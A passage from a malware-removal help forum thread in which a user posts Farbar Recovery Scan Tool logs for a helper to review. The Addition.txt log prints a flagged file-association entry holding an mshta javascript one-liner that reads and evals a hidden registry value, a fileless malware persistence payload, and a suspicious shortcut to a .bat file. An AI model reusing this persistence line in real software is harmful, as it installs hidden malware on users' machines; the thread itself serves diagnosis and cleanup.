ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {39802f99-0e1c-11e5-826f-9d41d4129edd}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {41b1de6c-4ac0-11e5-b6a5-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {46bc2adf-4ef4-11e6-b864-8e4e49a5f15c}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {4e494be7-a82c-11e4-9f21-bbcb7c4ae7c6}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {56d2cfbf-ffa5-11e4-9d76-8f895f96bdb5}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {59bbc8af-0652-11e5-9651-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {5d967430-26de-11e5-b69e-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {5e21caee-5d32-11e4-bba7-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {5ed48d07-3e9d-11e6-b4ce-890e583dd6aa}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {67a5f5d3-a4f2-11e4-a74f-990c0320d25c}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {6f394633-062c-11e5-9e46-c70a78578c1e}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {74b63f53-352e-11e6-9274-dba575b7dfbb}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {811b1a47-90ce-11e6-b3b4-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {84377095-c7f6-11e6-8d9d-9dd2077c58d7}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {853e0695-2035-11e6-b38d-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {89f532e5-5ef3-11e4-a253-a762ade906b2}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {90a49c7c-c7e3-11e6-b3bd-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {90d1b72f-2104-11e5-9fe8-96955d914c1a}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {90ec7a03-ad1f-11e6-a6b2-cd1b6bd63995}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {9f8b0992-69ad-11e5-b6ab-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {a48c66b7-5ecf-11e4-95d5-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {a9609e5e-3e81-11e6-b392-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {aba9da97-2c6f-11e5-9b7e-99b7c27ee180}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {b9ae0dde-ffcc-11e4-9646-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {ba3a276d-ad0c-11e6-b3ba-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {bd8e81a9-5115-11e6-b299-cac8d5d6ee70}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {bdae5240-d33f-11e4-b541-bf24e1a268f6}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {c0563399-74d7-11e4-ab1c-9cb198ec84d4}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {ca4e4464-2050-11e6-848b-b0cf0c155543}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {d24bf5bf-d322-11e4-9617-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {d27a4702-fde7-11e5-b382-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {d67b8984-9faa-11e5-b370-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {eed8252b-1c62-11e5-9523-b09403b1f74a}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {eed8252c-1c62-11e5-9523-b09403b1f74a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {f176c1fd-4ed8-11e6-b394-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {f2be3dd2-a817-11e4-9600-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {f69b7c33-f1c1-11e4-9635-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {fa4c8e4d-778e-11e5-bd80-df3b4abbd218}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {fd532406-7772-11e5-b365-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi


LastRegBack: 2017-01-18 11:49

==================== End of FRST.txt ============================

Offline Ozzie

Re: File Type Question
« Reply #35 on: January 25, 2017, 09:01:25 PM »
I apologize for it being so long.

Offline Corrine

Re: File Type Question
« Reply #36 on: January 25, 2017, 10:56:54 PM »
It seems you checked each box instead of leaving the default setting.  :) 

How about the Addition.txt log?


Take a walk through the "Security Garden" -- Where Everything is Coming up Roses!

Remember - A day without laughter is a day wasted.
May the wind sing to you and the sun rise in your heart.

Offline Ozzie

Re: File Type Question
« Reply #37 on: January 26, 2017, 03:05:33 PM »
Here is the Addition.txt log.

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-01-2017
Ran by nepta (24-01-2017 14:28:00)
Running from C:\Users\nepta\Downloads
Windows 10 Pro Insider Preview Version 1607 (X64) (2016-12-22 01:52:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3155403222-1004678540-3907824167-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3155403222-1004678540-3907824167-503 - Limited - Disabled)
Guest (S-1-5-21-3155403222-1004678540-3907824167-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3155403222-1004678540-3907824167-1005 - Limited - Enabled)
nepta (S-1-5-21-3155403222-1004678540-3907824167-1001 - Administrator - Enabled) => C:\Users\nepta

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader 9.0 Sprint (HKLM-x32\...\ABBYY FineReader 9.0 Sprint) (Version: 9.01.513.58212 - ABBYY)
ABBYY FineReader 9.0 Sprint (x32 Version: 9.01.513.58212 - ABBYY) Hidden
Adblock Plus for IE (32-bit and 64-bit) (HKLM\...\{0F347A49-E36C-4639-8D2E-003AD408B8B2}) (Version: 1.5 - Eyeo GmbH)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{D079CAAD-0C31-47A2-9AF5-A82F9CD9B221}) (Version: 5.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{64E6007B-1DA9-42CD-BBE4-D5FA67A7C71D}) (Version: 5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.26 - Piriform)
EPSON WorkForce 645 Series Printer Uninstall (HKLM\...\EPSON WorkForce 645 Series) (Version:  - SEIKO EPSON Corporation)
Fitbit Connect (HKLM-x32\...\{6EB73D9D-645E-415B-8008-83C3CB865968}) (Version: 2.0.1.6742 - Fitbit Inc.)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Earth (HKLM-x32\...\{A0C18B96-AB79-46BD-8321-6FA83E6D25B9}) (Version: 7.1.7.2606 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
HP Officejet Pro 8610 Basic Device Software (HKLM\...\{39DA3F40-0B9E-4002-8E01-108FEC9EFE43}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard)
HP Support Solutions Framework (HKLM-x32\...\{F6A11738-3EE4-4573-AEA5-6CD5D491C167}) (Version: 12.5.32.203 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iCloud (HKLM\...\{4BB313CE-D3D1-424C-8823-15CF85B00B05}) (Version: 6.1.0.30 - Apple Inc.)
IrfanView 64 (remove only) (HKLM\...\IrfanView64) (Version: 4.42 - Irfan Skiljan)
iTunes (HKLM\...\{81C96689-EA5B-4B7D-A04F-16326EC51BC2}) (Version: 12.5.4.42 - Apple Inc.)
KeePass Password Safe 2.35 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.35 - Dominik Reichl)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Money Plus (HKLM-x32\...\Money2008b) (Version: 17 - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\OneDriveSetup.exe) (Version: 17.3.6720.1207 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
NVIDIA 3D Vision Controller Driver 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 369.09 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 369.09 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.15.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.15.54 - NVIDIA Corporation)
NVIDIA Graphics Driver 369.09 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 369.09 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.53 - Piriform)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.500 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.15.54 - NVIDIA Corporation) Hidden
Software Update Wizard (Redistributable) 4.5 (HKLM-x32\...\Software Update Wizard (Redistributable)) (Version: 4.5 - PowerProgrammer)
Speccy (HKLM\...\Speccy) (Version: 1.30 - Piriform)
SplashShopper Desktop 3.1.0 (HKLM-x32\...\SplashShopper Desktop) (Version: 3.1.0 - SplashData)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
Xmarks for IE (HKLM-x32\...\{ABFA6EAE-C9C0-4B39-B722-02094EF6B889}) (Version: 127.0.177 - Xmarks)
YNAB 4 version 4.3.857 (HKLM-x32\...\com.ynab.YNAB4.LiveCaptive_is1) (Version: 4.3.857 - YouNeedABudget.com)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04771B00-E472-4CA7-B478-E2DCAD3DDFE7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {0BE0FB80-2013-4937-8462-C3EF4E350231} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {18A4D7EE-CCD8-4D33-9904-9064CF8A5DD9} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {2F431CA5-1A07-4DBF-B9FB-E13EB2E94F84} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceProtectionStateChanged
Task: {439B6DE1-58F7-48A1-AD8B-5B1EBC6CD269} - \Microsoft\XblGameSave\XblGameSaveTask\Logon -> No File <==== ATTENTION
Task: {5690CAE8-4FA1-42A9-9538-B06E4673EB24} - System32\Tasks\Microsoft\Windows\SysResetDelayedCleanup => Rundll32.exe ResetEng.dll,RjvDelayedCleanupEntryPoint
Task: {7597ADD9-C074-4C1E-A4A0-2650C0686697} - System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition => C:\WINDOWS\system32\ClipRenew.exe [2016-12-03] (Microsoft Corporation)
Task: {783E8AC2-3F32-4DE5-9F06-C062E4762819} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {7BFC09BB-DC63-4BD5-8011-5D65B94B3F11} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {A32A7355-CF98-41E0-B886-B6B74534B3CB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {AC707944-592E-444D-86B0-D4A4019DCA71} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-21] (Piriform Ltd)
Task: {E326602E-A55A-4DB3-8428-67A57CF0EB7C} - System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition => C:\WINDOWS\system32\ClipRenew.exe [2016-12-03] (Microsoft Corporation)
Task: {E9073F07-64D7-4A00-A6AA-B1FDAEE0FF88} - System32\Tasks\{2746715E-41F5-45F6-87C8-F6AD1333CC64} => pcalua.exe -a "C:\Program Files (x86)\Wondershare\MobileGo\unins000.exe" -c /WAF
Task: {EF82857E-6B76-45B1-9FE1-AD22C9553C59} - System32\Tasks\GoogleUpdateTaskMachineCore1d1b446eafdf7a7 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-13] (Google Inc.)
Task: {F19CEB9F-AAB9-459F-9C7B-29DD4EF0617A} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {F80142CF-167E-4F3D-BF86-F9531AD8E1B7} - System32\Tasks\Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask
Task: {FC0D430B-2A86-4FC5-988C-29544DBCE340} - System32\Tasks\{3B8F5E62-39B9-47BB-8AE7-DEB6E12BD22B} => pcalua.exe -a C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YINSHVA.EXE -c /R /APD /P:"EPSON WorkForce 645 Series"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\nepta\AppData\Local\685b23\0a1e0a.lnk -> C:\Users\nepta\AppData\Local\685b23\ee2b2d.bat (No File)

==================== Loaded Modules (Whitelisted) ==============

2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00347136 _____ () C:\Windows\System32\HrtfApo.dll
2016-09-01 17:12 - 2016-09-01 17:12 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () c:\windows\system32\CoreUIComponents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-12-21 19:58 - 2016-12-21 19:58 - 01678560 _____ () C:\Users\nepta\AppData\Local\Microsoft\OneDrive\17.3.6720.1207\amd64\ClientTelemetry.dll
2017-01-18 09:08 - 2017-01-18 09:08 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.152.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-01-18 09:08 - 2017-01-18 09:08 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.152.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00148752 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00186368 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-12-03 08:35 - 2016-12-03 08:35 - 00816640 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 10812416 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 02004480 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 01100800 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-12-03 08:35 - 2016-12-03 10:01 - 05280256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-21 19:30 - 2016-08-01 06:54 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-01-21 08:52 - 2017-01-21 08:52 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
2016-12-13 10:36 - 2016-12-13 10:36 - 00017408 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 03142840 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00410896 _____ () C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
2016-11-17 01:29 - 2016-11-17 01:29 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-09-01 17:13 - 2016-09-01 17:13 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 00189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2009-02-26 12:46 - 2009-02-26 12:46 - 00064344 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\ColleagueImport.dll
2011-06-22 10:46 - 2011-06-22 10:46 - 00434016 _____ () C:\Program Files (x86)\Microsoft Office\Office12\ADDINS\UmOutlookAddin.dll
2015-11-11 03:41 - 2015-11-11 03:41 - 00756376 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
2016-12-09 15:44 - 2016-12-08 01:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-09 15:44 - 2016-12-08 01:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2016-12-13 10:36 - 2016-12-13 10:36 - 12163072 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Weather.dll
2016-12-13 10:36 - 2016-12-13 10:36 - 00958464 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\SQLite3Wrapper.dll
2016-05-07 07:09 - 2016-05-07 07:09 - 00645120 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Aria.ClientTelemetry.dll
2016-08-20 10:17 - 2016-08-20 10:17 - 03312024 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.37.0_x86__8wekyb3d8bbwe\Microsoft.Advertising.dll
2015-11-04 12:40 - 2015-10-11 21:05 - 00013088 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\Software\Classes\05592: "C:\WINDOWS\system32\mshta.exe" "javascript:qQDHE1RB8="Mzhx5ZR";Ba8=new ActiveXObject("WScript.Shell");HCenQii8="bzZ";q4GcW=Ba8.RegRead("HKCU\\software\\lcepqwksl\\apojauvq");lEkDKq6="LjAo";eval(q4GcW);F55NPtu="ix";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

There are 6091 more sites.


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-19 16:09 - 2015-10-19 16:07 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\Control Panel\Desktop\\Wallpaper -> c:\users\nepta\pictures\wallpaper\12122952_1169510753063347_5170063591229541779_n.png
DNS Servers: 192.168.1.1
